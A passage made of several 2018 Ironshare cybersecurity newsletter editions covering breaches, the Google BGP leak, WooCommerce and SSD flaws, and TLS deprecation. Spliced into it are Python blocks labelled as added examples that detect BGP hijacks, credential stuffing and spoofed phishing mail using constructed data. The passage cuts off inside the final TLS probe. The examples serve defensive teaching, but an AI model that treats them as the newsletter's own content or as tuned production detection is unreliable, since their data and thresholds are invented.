Early this morning, our Twitter account was inappropriately accessed. The access lasted for approx. half an hour & one fake tweet was posted during that time about a bitcoin scam. We have regained control of the account, are in close contact with Twitter & are investigating now.

Please don’t get drawn into these scams, as they will not increase the size of your crypto wallet; they just fund the bad guys to continue these types of campaigns.

To prevent your Twitter accounts from being hijacked, use complex and unique passwords that are not used anywhere else, and ensure that Two Factor Authentication (also called Login Verification) is enabled.

Whether Twitter are doing enough to assist with or prevent these activities is debatable, but they should be looking to put measures in place to further protect their users' accounts. Industry experts such as Graham Cluley have suggested the mandatory use of 2FA, which sounds like a great start to us!

High Profile outages for Facebook and Google

Two very high-profile outages occurred on Monday 12th November, for internet giants Facebook and Google. These currently look to be two very different issues, although there were suspicions that these may have been malicious in nature.

Facebook suffered an outage that was experienced across the United States, lasting roughly 30 mins and starting at approximately 1300hrs ET. The outage affected all Facebook services, including WhatsApp and Instagram. USA Today reported that Facebook had confirmed that their outage was due to a scheduled test that ultimately failed, although no further information about this test was disclosed.

Google on the other hand were not so lucky. Their issue caused a denial of service (DoS) for G Suite and Google Search services and lasted for approximately 74 mins. The issue was blamed on a BGP routing misconfiguration made by a small ISP company in Lagos, Nigeria, called MainOne. Ars Technica reports that updates to the Internet’s global routing table made by MainOne meant that hundreds of IP address ranges belonging to Google were advertised as being reachable through their network. Minutes later China Telecom received and accepted the update, advertising it on to other large Internet Service Providers, such as the Russian-based Transtelecom.

These kinds of route changes can often go unnoticed, but as traffic destined for Google was redirected to China Telecom, the Great Firewall of China (used to regulate, control and censor Internet traffic within Chinese territories) dropped the traffic at its edge, causing the outage.

Currently neither of these incidents appears to be the result of malicious actions, but it does continue to raise questions about the security limitations within BGP, the internet’s routing protocol. BGP hijacking is not uncommon and we have seen multiple instances dating back to 2010, where China Telecom briefly redirected internet traffic through China, for what can only be malicious intent.

It's time we moved away from this trust-based model with BGP and got on with fixing these long-standing security problems.
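
The MainOne incident is a route leak: prefixes announced by a network that was never authorised to originate them, accepted on trust by its neighbours. One deployed answer to the trust-based model criticised above is route origin validation, where each prefix carries a signed record (an RPKI ROA) naming the ASN allowed to originate it and the longest prefix length permitted, and routers classify every announcement as valid, invalid or unknown. The Python below is an added example, not from the original post, Ars Technica, MainOne or any router vendor: the ROA table, ASNs and update feed are constructed, and the classification follows the three states defined in RFC 6811. It catches both common hijack shapes, a wrong origin AS and a more-specific prefix that would win the routing decision even when the origin looks right.

```python
"""Route-origin validation for BGP announcements, RPKI ROA style (added example)."""
import ipaddress

# Constructed ROA-style records: (prefix, max_length, authorised origin ASN).
# Documentation ranges and private ASNs are used throughout.
ROAS = [
    ("203.0.113.0/24", 24, 64500),
    ("198.51.100.0/22", 24, 64500),
]


def validate_origin(prefix, origin_asn, roas=ROAS):
    """Classify one announcement as 'valid', 'invalid' or 'unknown'.

    RFC 6811 semantics: 'valid' when some covering ROA matches both the
    origin ASN and the length limit; 'invalid' when ROAs cover the prefix
    but none matches; 'unknown' when no ROA covers the prefix at all.
    """
    announced = ipaddress.ip_network(prefix, strict=False)
    covered = False
    for roa_prefix, max_len, asn in roas:
        roa_net = ipaddress.ip_network(roa_prefix)
        if announced.version != roa_net.version or not announced.subnet_of(roa_net):
            continue
        covered = True
        if asn == origin_asn and announced.prefixlen <= max_len:
            return "valid"
    return "invalid" if covered else "unknown"


def suspicious_updates(updates, roas=ROAS):
    """Return (prefix, origin_asn, state) for every update that validates as invalid."""
    results = [(p, a, validate_origin(p, a, roas)) for p, a in updates]
    return [r for r in results if r[2] == "invalid"]


# Constructed update feed: the legitimate origin, a wrong-origin announcement
# (the shape of the Google leak), a more-specific announcement beyond the
# ROA's max length, and a prefix with no ROA at all.
UPDATES = [
    ("203.0.113.0/24", 64500),
    ("203.0.113.0/24", 64666),
    ("198.51.100.0/25", 64500),
    ("192.0.2.0/24", 64500),
]

if __name__ == "__main__":
    for prefix, asn in UPDATES:
        print(f"{prefix:<18} AS{asn}: {validate_origin(prefix, asn)}")
    print("drop or depref:", suspicious_updates(UPDATES))
```

The usual deployment policy is to reject or heavily de-prefer `invalid` routes and accept `unknown` ones, because most of the routing table still has no ROA; the protection is therefore only as good as the fraction of prefixes, Google's included, that publish one.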

MiSafes Smartwatches puts children at risk

MiSafes’ leading smartwatch for children has been found to be extremely easy to hack, placing thousands of its child users at risk. Security researchers at Pen Test Partners found that children’s movement and activities could be tracked by malicious actors.

GPS sensors and a 2G data connection in the watch allow parents to know their child’s location, listen in on what the child is doing and also make a call to the child’s watch, all via their smartphone app.

Once compromised, malicious actors are capable of gaining the real-time locations of children and personal information from the device, while also sending messages and making calls that appear to be from the parent.

No advanced hacking skills were required to compromise these watches, just simple use of free online tools and some basic coding ability.

Until the manufacturers of these devices can prove that they have resolved these security issues, Pen Test Partners recommend that you do not use these GPS-based watches to track your children.

https://www.pentestpartners.com/security-blog/consumer-advice-kids-gps-tracker-watch-security/

Microsoft’s November 18 Patch Tuesday

Patch Tuesday, for those not familiar with the name, refers to Microsoft’s monthly security update release day, which typically falls on the second Tuesday of the month. The latest Patch Tuesday includes a total of 53 vulnerabilities: 11 are rated Critical, 40 are rated Important, and the remaining two are rated Moderate and Low.

Included in these Critical vulnerabilities are several memory corruption vulns that are present in Microsoft Edge, Windows Deployment Service TFTP Server, Internet Explorer, and the VBScript engine, which can all result in local and remote code execution.

There are also a number of key vulns rated Important that should not be overlooked. Several remote code execution vulns exist within MS Office products (Outlook & Excel), PowerShell and Internet Explorer, while the Windows COM Aggregate Marshaler can be exploited to gain elevated privileges.

Full details can be found at the link below:

November Security Update Release Notes
https://portal.msrc.microsoft.com/en-us/security-guidance

Accompanying the release is an Important advisory for Adobe Flash Player, which if exploited can lead to information disclosure and remote code execution. This affects the Microsoft Edge and Internet Explorer browsers as well as Chrome.

https://helpx.adobe.com/security/products/flash-player/apsb18-39.html

Don’t delay, review and get patching now!

And that’s it for this week, please don’t forget to tune in for our next instalment.

Ironshare – Security Simplified

Edition #17 – 16th November 2018

By

Stuart Hare

on

15/11/18

Cyber Round-up

Cyber Round-up for 9th November


Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

HSBC confirms data breach for US customers

On November 2nd the global banking giant HSBC reported to the California Attorney General's office that they had suffered a breach of US customer data, that has compromised customer names, addresses, account numbers, balances, transaction history and more.

In their notice, HSBC state they identified unauthorised access to online customer accounts between the dates of the 4th and 14th October 2018, and as a result all impacted accounts had online access suspended to prevent further compromise. Further action has been taken to increase the security around the online banking authentication process, while also providing victims with a free subscription to the Identity Guard identity theft protection service.

It is believed that the unauthorised access was successfully achieved using a credential stuffing attack. Credential stuffing relies on previously leaked credential data (usernames and passwords), which has been disclosed as part of another, potentially unrelated, breach. It takes this data and automatically injects these credentials into the system being targeted, in the hope that a match will be found and access will be granted.

To reduce the chance of being a victim of a credential stuffing attack, it is crucial that you don’t use the same combination of username and password on more than one site or system. ALWAYS use unique passwords that are not shared with any other service. If you know that you are using the same password for multiple things, then you should go and change them now.

If, like most of us, you are becoming overwhelmed by the number of passwords you have to remember, then it's time for you to get a password manager! Go search Google and check out which one is right for you.

HSBC notice: https://oag.ca.gov/system/files/Res%20102923%20PIB%20MAIN%20v3_1.pdf
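
Credential stuffing, as described above, has a distinctive shape in authentication logs that the service operator can look for: one source trying many different usernames in a short window, mostly failing, which is quite unlike a genuine user retrying a single account. The Python below is an added example of that detection, not HSBC's code or process; the log format, timestamps, IP addresses, usernames and thresholds are all constructed for the example. The `successes` it reports per source are the accounts a defender would suspend and force through re-authentication, which is the action HSBC's notice describes.

```python
"""Credential-stuffing detection over authentication logs (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<ISO timestamp> ip=<addr> user=<name> result=<ok|fail>"
# 198.51.100.7 sprays seven accounts in four seconds and gets one hit;
# 203.0.113.9 is a person mistyping their own password twice.
LOG_LINES = """\
2018-10-04T09:00:01 ip=198.51.100.7 user=alice result=fail
2018-10-04T09:00:02 ip=198.51.100.7 user=bob result=fail
2018-10-04T09:00:02 ip=198.51.100.7 user=carol result=ok
2018-10-04T09:00:03 ip=198.51.100.7 user=dave result=fail
2018-10-04T09:00:03 ip=198.51.100.7 user=erin result=fail
2018-10-04T09:00:04 ip=198.51.100.7 user=frank result=fail
2018-10-04T09:00:04 ip=198.51.100.7 user=grace result=fail
2018-10-04T09:05:00 ip=203.0.113.9 user=heidi result=fail
2018-10-04T09:05:20 ip=203.0.113.9 user=heidi result=fail
2018-10-04T09:05:45 ip=203.0.113.9 user=heidi result=ok
"""


def parse_line(line):
    """Parse one constructed log line into a dict with a datetime under 'ts'."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def find_stuffing_sources(lines, window=timedelta(minutes=5),
                          min_users=5, min_fail_ratio=0.8):
    """Return {ip: details} for sources whose attempts look like credential stuffing.

    The signature is many *distinct* usernames from one source within the
    window together with a high failure rate. A forgetful user retrying one
    account trips neither condition. Thresholds are constructed for the
    example and would be tuned per service.
    """
    by_ip = defaultdict(list)
    for line in lines.strip().splitlines():
        rec = parse_line(line)
        by_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        # Slide a time window over the source's attempts; keep the latest
        # qualifying window so the report covers the whole burst.
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            window_recs = recs[start:end + 1]
            users = {r["user"] for r in window_recs}
            fails = sum(r["result"] == "fail" for r in window_recs)
            if len(users) >= min_users and fails / len(window_recs) >= min_fail_ratio:
                flagged[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(window_recs),
                    "failures": fails,
                    # accounts the attacker actually got into: suspend these
                    "successes": sorted(r["user"] for r in window_recs
                                        if r["result"] == "ok"),
                }
    return flagged


if __name__ == "__main__":
    for ip, details in find_stuffing_sources(LOG_LINES).items():
        print(ip, details)
```

Real campaigns spread attempts across large proxy pools, so a per-IP view like this one is the first layer, not the last: the same windowing applied per account (many sources, one username) and per ASN or device fingerprint catches what single-source counting misses, and the per-source success list is what feeds the account suspensions.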

Criminal’s encrypted chat cracked by Police

IronChat, an encrypted messaging platform provided on Blackbox Security’s IronPhones, has been cracked by the Dutch police, who were able to listen in on over 250,000 chat messages of suspected criminals.

IronChat has been popular amongst criminal circles for providing the means to communicate confidentially about their illicit activities. Unbeknown to the users, their conversations were being monitored by the Dutch police, which resulted in arrests and the seizure of weapons, drugs and cash.

BlackBox Security’s website has since been seized by the authorities and its owners have been arrested on suspicion of criminal involvement.

Check out Graham Cluley’s post on Bitdefender for more details:

https://hotforsecurity.bitdefender.com/blog/police-crack-encrypted-chat-service-ironchat-and-read-258000-messages-from-suspected-criminals-20530.html

Remote Code Flaw found in WooCommerce

Security researchers at RIPS Technologies have discovered remote code execution and privilege escalation flaws in the immensely popular WooCommerce WordPress plugin. WooCommerce is an online shop plugin that’s used by over 4 million websites worldwide.

All that is needed to successfully launch this attack is for a compromised user to possess the ‘Shop Manager’ role, which permits them to manage products, customers and orders for the online shop.

By simply injecting a malicious payload that deletes certain files, WordPress security checks can be bypassed, allowing the malicious shop manager to take over the WordPress admin account and gain full control of the site. This could be launched through a simple phishing attack, or through Cross Site Scripting (XSS) vulnerabilities.

Users who are running WooCommerce should ensure that they have upgraded to at least version 3.4.6, and always keep up to date with the latest releases.

Full details and a video showing how simple the compromise is can be found on the RIPSTECH blog:

https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/

Critical Vulnerabilities in Self-Encrypting SSDs

Multiple critical vulnerabilities have been found in popular self-encrypting solid-state storage devices, that allow a malicious actor to recover protected data by decrypting the disk.

Researchers at Radboud University in the Netherlands reverse engineered the hardware that provides full disk encryption on Crucial and Samsung solid-state drives, and found flaws that break the encryption on these devices.

Issues were found in the ATA Security and TCG Opal implementations, where, due to there being no cryptographic link between the password and the encryption key, attackers can manipulate the password validation routine in RAM and use any password to decrypt the data.

In addition to this, wear levelling exploits were found in Samsung devices, which leave unprotected encryption keys available for retrieval, while Crucial devices were also found to have blank Master Passwords by default, allowing encrypted data to be retrieved using a blank password.

It doesn’t stop there: if you are using BitLocker as your disk encryption of choice, you should be aware that due to BitLocker’s default behaviour of using the hardware encryption available over its own software-based encryption, you will still be vulnerable if using the affected devices.

Crucial have since released patches for all its affected devices, while Samsung has provided updates for its T3 and T5 SSDs.

https://thehackernews.com/2018/11/self-encrypting-ssd-hacking.html

And that’s it for this week, please don’t forget to tune in for our next instalment.

Ironshare – Security Simplified

Edition #16 – 9th November 2018

By

Stuart Hare

on

9/11/18

Cyber Round-up

Cyber Round-up for 2nd November


Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

ICO show a 400% increase in reported cyber incidents

The Information Commissioner's Office (ICO), the driving force behind upholding information rights and data privacy, have reported that since the introduction of the General Data Protection Regulation (GDPR) in May of this year, they have witnessed a dramatic 400% increase in disclosed cyber-security incidents.

Within the first quarter of this financial year, 414 security incidents were reported to the ICO, jumping from an average of 90 incidents per quarter for the whole of the previous year. This increase coincides with the release of the GDPR, which enforces that security incidents must be reported within 72 hours of discovering an attack or breach.

In addition, the ICO have highlighted in their report that the three main sectors impacted specifically by data breaches were Health, General Business and Education, while the main victims of other cyber incidents were General Business, Finance & Insurance, and Education. As expected, the top attack vector used in these reported incidents was the ‘phishing attack’, followed by the more generic ‘unauthorised access’ and ‘malware’ categories.

What is clear from this is not that there has been a 400% increase in attacks during this period, but that the GDPR is showing signs of success with its mandated reporting period. That said, cyber incidents are continuing to rise at pace, with more data breaches and attacks hitting the news every week.

If you do not have an active cyber security strategy in place within your organisation, please get to work on it now, before you become the next victim.

https://www.scmagazineuk.com/ico-reveals-400-increase-reports-cyber-security-incidents/article/1496828?bulletin=sc-newswire

Manufacturing a prime target sector for hackers

Following on from our piece on the PwC law firms report last week, we came across the Kroll Global Fraud and Risk Report, which studies a number of different industrial sectors, analysing the risks associated with Fraud, Cyber and Security incidents.

The manufacturing sector has consistently experienced a higher than average percentage of risks associated with Fraud and Cyber Security over the last few years. 86% of manufacturing companies surveyed stated they had been affected by Fraud, and 88% had been the victim of a Cyber Security related incident in the last 12 months.

The most common type of fraud reported was in the form of data loss or theft, followed by corruption and bribery, while virus and worm attacks lead the Cyber risks, ahead of phishing and data breaches.

The report also highlights Cyber Security as the key aspect that board members found difficult to remain engaged with or provide meaningful direction on to their organisation, mainly due to complex technology or mechanisms being beyond their understanding.

As with a lot of companies, the focus is on technology as the major contributor to the success of attacks, which feeds the board issues mentioned above. If we can re-educate our board members to understand that the end-user human element is often the primary cause of such attacks, then maybe they, along with senior leaders, can appreciate the important role they have to play in driving Cyber Security strategy from the top down.

This report provides further evidence that no industrial sector or company is immune from the risk of today’s modern cyber-attacks.

British Airways – Breach Update

The British Airways breach returned to the news late last week, with worrying information that an additional 185,000 customers may have been impacted by the earlier cyber-attack, increasing the scope of the personal information leaked to approximately 565,000 affected passengers.

Full credit card information (including CVV numbers and expiry dates), names, billing information and email addresses for 77,000 customers have potentially been compromised. Additionally, personal details and credit card info for 108,000 passengers, this time without CVV, have also been identified.

BA claims not to have conclusive evidence that confirms information was actually removed from their systems, but as a precaution they are proceeding as if it has been.

BA now face a huge fine in line with the GDPR, that could be as much as £500m, if the ICO decides to take action. Concerned customers should access the following BA website link for the latest information on what to do if they believe they are impacted.

https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information

BLEEDINGBIT Vulnerability in Bluetooth Wi-Fi Chips

Researchers at Armis Security have identified two Remote Code Execution vulnerabilities in Texas Instruments Bluetooth Low Energy chips that are found in common Wireless Access Point appliances. Devices affected by these vulnerabilities include Wireless Access Points by Cisco, Meraki and Aruba. Unfortunately, a bigger concern is that these vulnerable chips can also be found in medical devices such as pacemakers and insulin pumps.

The first of the two vulns, CVE-2018-16986, exists in the BLE stack, where an attacker that is in the proximity of a vulnerable device can send a specially crafted BLE frame and trigger a corruption in memory. The attacker is then able to run malicious code and potentially take full control of the device.

The second vuln, CVE-2018-7080, exists in the Over the Air Downloads (OAD) feature of the chip’s firmware, and provides a backdoor to the product simply by sniffing the OAD traffic and capturing the password used. Texas Instruments advises that OAD should be disabled by vendors prior to shipping.

Cisco have advised that BLEEDINGBIT is only exploitable on a limited number of devices and is also not present in the default configuration of these devices. The BLE feature and scanning mode must be enabled for their devices to be vulnerable. The Cisco advisory is included below:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181101-ap

Denial of Service Bug Found in Cisco Security Appliances

During the investigation of an active support case, Cisco have identified a Denial of Service vulnerability in their ASA and FTD security appliances, that can cause excessive CPU usage and has the potential to crash and restart vulnerable devices.

The vulnerability exists due to improper handling of SIP traffic, and by sending specially crafted SIP requests an attacker can trigger the issue on affected devices.

Software updates to resolve this bug are currently not available, but there are several workarounds that can assist in the meantime, which include disabling SIP inspection and rate limiting SIP traffic.

For details on this bug, the vulnerable devices and the workarounds available, please see the Cisco Advisory linked below:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos

And that’s it for this week, please don’t forget to tune in for our next instalment.

Ironshare – Security Simplified

Edition #15 – 2nd November 2018

By

Stuart Hare

on

2/11/18

Cyber Round-up

Cyber Round-up for 26th October

Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.

Just Another Failure in Airline Security

And this time it's the giant Cathay Pacific in the news for another huge data leak. The Hong Kong airline is reported to have suffered a major leak of customer data that affects approximately 9.4 million passengers.

Cathay's investigation into the breach, which involved the Hong Kong Police and authorities, has been ongoing for some time, after suspicious activity was detected on their systems back in March 2018. Cathay have confirmed that passenger personal information was accessed without authorisation, including names, addresses, dates of birth, email addresses, passport numbers, identity card numbers and credit card information.

Criticism has been raised over the amount of time it has taken Cathay to report the breach to its customers, but the company has defended this, stating that it felt it was key to deliver accurate information before disclosing the breach, to prevent panic.

This news arrives on the back of the data breach at British Airways last month, where 380,000 customer records were stolen. That now looks like a drop in the ocean, completely overshadowed by the number of records lost by Cathay Pacific.

Reuters have reported a significant loss in share price, dropping 7% to a 9-year low as a result of the breach, and they are not expecting this to improve in the short term.

Cathay Pacific has published an InfoSecurity page which includes information on the breach and what to do if you think you may have been affected. They also have a Twitter account (linked below) for direct contact if required.

https://infosecurity.cathaypacific.com/en_HK.html
Twitter: https://twitter.com/CxInfosec

Publishing House Warns of Increase in Phishing Scams

The publisher Penguin Random House has recently released information warning of a significant increase in phishing scams, which started in Asia and have spread to Europe, the UK and the United States.

These scams have targeted agencies and publishers in order to gain access to sensitive information and attempt to steal manuscripts. The scammers typically pose as legitimate, trusted literary agents, using spoofed email addresses and look-alike websites to convince the targets to share the information, before converting the stolen manuscripts to e-books and selling them online.

PRH said “Like other companies, Penguin Random House takes all reports of phishing activity and email scams seriously and, when appropriate, notifies its employees to recognize and prevent such attempts. Employee awareness and training, particularly with respect to phishing scams, is a critical component of our company's cybersecurity program,”

The NCSC's guidance to publishing organisations is to remain vigilant to the possibility of phishing attacks. Today's phishing attacks are becoming far more sophisticated and difficult to detect, often including real names, real email addresses and websites. Statements such as this may also be included: 'To show this is not a phishing email, we have included the month of your birth and the last 3 digits of your phone number'. Treat that kind of reassurance as a warning sign rather than proof: a fraudster who has already obtained a little of your personal data uses it precisely to buy your trust.

https://www.publishersweekly.com/pw/by-topic/international/Frankfurt-Book-Fair/article/78336-phishing-scam-seeking-manuscripts-spreads-worldwide.html

For more information on preparing and protecting yourself from phishing attacks please see the published guidance from the NCSC.

https://www.ncsc.gov.uk/phishing
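The checks a mail gateway or analyst can run against the kind of spoofed "agent" email described above, as an added example that is not from the Ironshare post, Penguin Random House or the NCSC. It compares the visible From: domain with the envelope sender and Reply-To, reads the SPF and DKIM verdicts your own MX records in Authentication-Results, and flags the "this is not a phishing email" reassurance as a lure. The two sample messages and the example.* domains are constructed.

```python
"""Added example (not from the Ironshare post, Penguin Random House or the
NCSC): flag inbound mail whose visible From: address is not backed by the
infrastructure that actually sent it. Sample messages are constructed."""
import email
import re
from email import policy
from email.utils import parseaddr
from typing import List

# Reassurances that legitimate senders do not need to give.
LURE_PHRASES = ("not a phishing email", "to show this is genuine")


def _domain(header_value) -> str:
    """Lower-cased domain of the first address in a header, '' if none."""
    _, address = parseaddr(str(header_value or ""))
    return address.rpartition("@")[2].lower() if "@" in address else ""


def _auth_result(msg, method: str) -> str:
    """Verdict recorded for spf= or dkim= in Authentication-Results, else 'none'.
    Only trust this header when your own MX adds it and strips inbound copies."""
    for hdr in msg.get_all("Authentication-Results", []):
        m = re.search(rf"\b{method}=(\w+)", str(hdr))
        if m:
            return m.group(1).lower()
    return "none"


def phishing_indicators(raw: str) -> List[str]:
    """Return human-readable reasons to distrust the message; empty means clean."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_dom = _domain(msg.get("From"))
    return_dom = _domain(msg.get("Return-Path"))
    reply_dom = _domain(msg.get("Reply-To"))
    findings = []
    if return_dom and return_dom != from_dom:
        findings.append(f"envelope sender {return_dom} does not match From domain {from_dom}")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"replies are diverted to {reply_dom}")
    if _auth_result(msg, "spf") != "pass":
        findings.append("SPF did not pass for the envelope sender")
    if _auth_result(msg, "dkim") != "pass":
        findings.append("no valid DKIM signature")
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body else ""
    if any(phrase in text for phrase in LURE_PHRASES):
        findings.append("body contains a 'this is not phishing' reassurance, a known lure")
    return findings


# Constructed sample: a genuine agent message after our MX has added its
# Authentication-Results header.
LEGIT = """\
Return-Path: <agent@example-agency.com>
Authentication-Results: mx.example-publisher.com; spf=pass smtp.mailfrom=example-agency.com; dkim=pass header.d=example-agency.com
From: Literary Agent <agent@example-agency.com>
To: editor@example-publisher.com
Subject: Revised manuscript

The revised chapters are attached as agreed.
"""

# Constructed sample: the same visible From: address, sent through unrelated
# infrastructure with replies steered to a webmail account.
SPOOFED = """\
Return-Path: <bounce@bulk-mailer.example>
Authentication-Results: mx.example-publisher.com; spf=fail smtp.mailfrom=bulk-mailer.example; dkim=none
From: Literary Agent <agent@example-agency.com>
Reply-To: agent.example-agency@webmail.example
To: editor@example-publisher.com
Subject: Urgent: full manuscript needed today

To show this is not a phishing email, we have included the month of your birth.
Please send the complete manuscript today.
"""

if __name__ == "__main__":
    for name, sample in (("legit", LEGIT), ("spoofed", SPOOFED)):
        print(name, phishing_indicators(sample))
```

The header checks are only as good as the Authentication-Results your own gateway writes; an attacker can add that header themselves, which is why gateways strip any copy that arrives from outside before adding their own.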

FreeRTOS IoT Devices Exposed to Multiple Vulnerabilities

Researchers at Zimperium have identified thirteen vulnerabilities in the market-leading FreeRTOS open source real-time operating system, which is used by millions of IoT devices and embedded platforms worldwide. FreeRTOS has been maintained by Amazon Web Services since they took it on board in 2017.

These vulnerabilities exist in the FreeRTOS TCP/IP stack and include remote code execution, denial of service and information leakage flaws that can result in the complete compromise of an affected device.

Affected versions include FreeRTOS up to v10.0.1, AWS FreeRTOS up to v1.3.1, the commercial version OpenRTOS, and the safety-oriented version called SafeRTOS. Note that the flaws are in the TCP/IP component, so a FreeRTOS device that uses a different network stack, or that has no network connectivity at all, is not exposed to them.

Zimperium collaborated with AWS to produce patches for these vulnerabilities, which are now available in AWS FreeRTOS v1.3.2 and later.

If you believe you are running devices that include FreeRTOS or the other versions mentioned above, it is recommended that you apply the patches, or upgrade to the latest firmware, as soon as possible.

https://blog.zimperium.com/freertos-tcpip-stack-vulnerabilities-put-wide-range-devices-risk-compromise-smart-homes-critical-infrastructure-systems/

Morrisons take the Blame for Rogue Insider

The Morrisons data breach case, which stretches back to 2014, took another turn this week when the Court of Appeal upheld the initial High Court ruling that Morrisons were responsible for breaches of employee privacy, meaning they could now face a massive pay-out to those affected.

Andrew Skelton, a senior auditor at Morrisons, was jailed for leaking the payroll data of approximately 100,000 employees, when he posted personal information that included names, bank details and salaries online.

The case was brought when over 5,500 employees sought compensation for distress caused by the disclosure of their personal information, and for the possible exposure to identity theft and financial loss.

Morrisons remain defiant that they did all they could to protect their employees, working quickly to take down the leaked data, and argue they should not be held responsible. After another court room loss, they will now take their case to the UK Supreme Court.

Breaches like this show that protecting against the insider threat is as important (if not more important) than protecting against external threats from the internet. Organisations must defend against the insider threat by following some base principles:

  • Ensure that staff are provided only the privileges they require to perform their role;
  • Segment critical systems away from user networks;
  • And apply the appropriate access controls through the network to limit communication with critical systems.

https://news.sky.com/story/morrisons-faces-vast-data-leak-compensation-payment-11532490

PWC Law Firms Survey ranks Cyber Threats in Top Risks

PwC have released their 2018 annual law firms' survey results, which highlight that cyber threats and technology developments rate highly among the top concerns for law firms over the last 12 months.

Cyber threats are an increasingly common topic for boards of directors, who now have to focus much more on the real risk posed by attacks and instances of data loss, which are not going away any time soon. The report states:

“There are many threats to law firms achieving their growth ambitions, but those that cause the biggest concern are Brexit, shortage of talent, cyber threats and technology.”

86% of the top 10 law firms, 92% of the top 26-50 and 86% of the top 51-100 see cyber threats as their biggest risk and cause for concern. As these firms hold large amounts of client data and confidential information, they make an attractive target for external actors.

These levels of concern are warranted, since 60% of firms reported a security-related incident during the last year, consistent with the 61% reported in the previous year. The 2018 report can be found below:

https://www.pwc.co.uk/industries/law-firms/pwc-law-firms-survey-report-2018-final.pdf

This is more proof that the threat of cyber-attack is prevalent across all industries in today's internet-connected world. Malicious actors are not letting up or taking a break, and nor should you.

Don't put off your cyber security plan, or think you won't be a victim; prepare and improve your cyber defences today, before it's too late.

And that's it for this week, please don't forget to tune in for our next instalment.

Sign Up

Ironshare – Security Simplified

Edition #14 – 26th October 2018

By Stuart Hare on 26/10/18

Cyber Round-up

Cyber Round-up for 19th October

Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.

30,000 Records Leaked in Pentagon Data Breach

News of a data breach at the Pentagon broke earlier this week, with reports that both credit card data and personal information of up to 30,000 civilian and military personnel had been leaked.

The source of the breach was not the Pentagon itself but a third-party vendor that provided travel services for Defense Department staff. For obvious security reasons the Pentagon has decided not to disclose the name of this third party while the investigation continues, but it has confirmed that no classified information was compromised as part of this breach.

The investigation into the size and scope of the breach is still ongoing, but a Pentagon spokesman was keen to point out that the data leak was the result of a hack on a single vendor that provided a service to a small portion of DoD personnel.

This is not the first hack or data breach experienced by the DoD, and it certainly won't be the last. The timing couldn't have been worse though, as a damning report recently released by the United States Government Accountability Office highlighted critical vulnerabilities present in most weapon systems that make them susceptible to sophisticated cyber-attacks.

https://apnews.com/7f6f4db35b0041bdbc5467848225e67d

NCSC Annual Review 2018

The National Cyber Security Centre, the driving force in securing the UK's cyber defences, has this week released their annual review, which details their activities and successes throughout their second year.

Since their creation in 2016 the NCSC has strived to make the UK a safer place to live and work online, and this report highlights how they have continued on that path during the last 12 months.

The direction, information and published guidance produced by the NCSC is excellent, with simple and concise approaches that can be applied to all organisations regardless of type or size.

The NCSC have been involved in key activities throughout the year: publishing guidance for small businesses and charities to improve their security, hosting the CyberUK conference in Manchester, establishing educational courses to get young people into cyber security, and working with their US counterparts to issue alerts on the malicious activity of the Russian government, to name just a few.

Combine this with their involvement in hundreds of cyber security incidents and the take-down of thousands of malicious sites and domains, and the value the NCSC provides to the UK is priceless. We look forward to seeing what is in store for the next 12 months.

https://www.ncsc.gov.uk/annual-review-2018/

TLS 1.0 & TLS 1.1 Finally being Retired

All major browser vendors have this week officially released notices on the retirement of the legacy TLS 1.0 and 1.1 protocols, which is due to start in January 2020 with Google Chrome. TLS, or Transport Layer Security, is the critical security protocol used with HTTPS to protect and encrypt modern-day web traffic.

Since SSLv3 (Secure Sockets Layer) was formally deprecated in June 2015, we have been waiting to hear the fate of the early TLS versions. TLS 1.0 is nearly 20 years old, still permits older insecure cipher suites (including the export-grade suites abused by the FREAK downgrade attack), and is the version targeted by the BEAST attack.

Early this year the industry had a big push to move all sites over to TLS 1.2 in preparation for this retirement, and the likes of Microsoft already have plans in place for their Office 365 SaaS platform to mandate the use of TLS 1.2 from 31st October 2018, as we covered in a previous post.

In August 2018 the IETF published TLS 1.3 as the new internet security standard (RFC 8446), which has paved the way for these legacy versions to be dropped from use. This is all due to start in January 2020 when Google removes support from Chrome, followed by Safari and Mozilla Firefox in March 2020, and Microsoft at some point in the first half of 2020.

If you are still running services that rely on TLS 1.0 or 1.1, you should start planning now to move to TLS 1.2 as a minimum. Although the vendors' statistics suggest that the proportion of connections using these protocols is at an all-time low, remember to consider your legacy internal systems too, and check where TLS is actually terminated: load balancers, reverse proxies and appliances are often where old protocol versions and cipher suites linger after the servers behind them have been fixed. Depending upon your infrastructure, applications or services this may be a lengthy process to complete, so don't delay.
Links to the vendor notices are contained below:

Safari: https://webkit.org/blog/8462/deprecation-of-legacy-tls-1-0-and-1-1-versions/
Google: https://security.googleblog.com/2018/10/modernizing-transport-security.html
Microsoft: https://blogs.windows.com/msedgedev/2018/10/15/modernizing-tls-edge-ie11/
Mozilla: https://blog.mozilla.org/security/2018/10/15/removing-old-versions-of-tls/
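Two practical checks for the migration described above, as an added example that is not from the Ironshare post or any of the browser vendors: a policy function that tells you whether a Python client context would still negotiate TLS 1.0 or 1.1, and a probe that attempts one handshake per protocol version against a server of your own so you can see which legacy versions it still accepts. The host name in the `__main__` block is an assumption; replace it with one of your own services.

```python
"""Added example (not from the Ironshare post or any browser vendor): audit
TLS version floors on your own clients and probe what a server still offers.
The target host at the bottom is an assumption."""
import socket
import ssl
from typing import Dict

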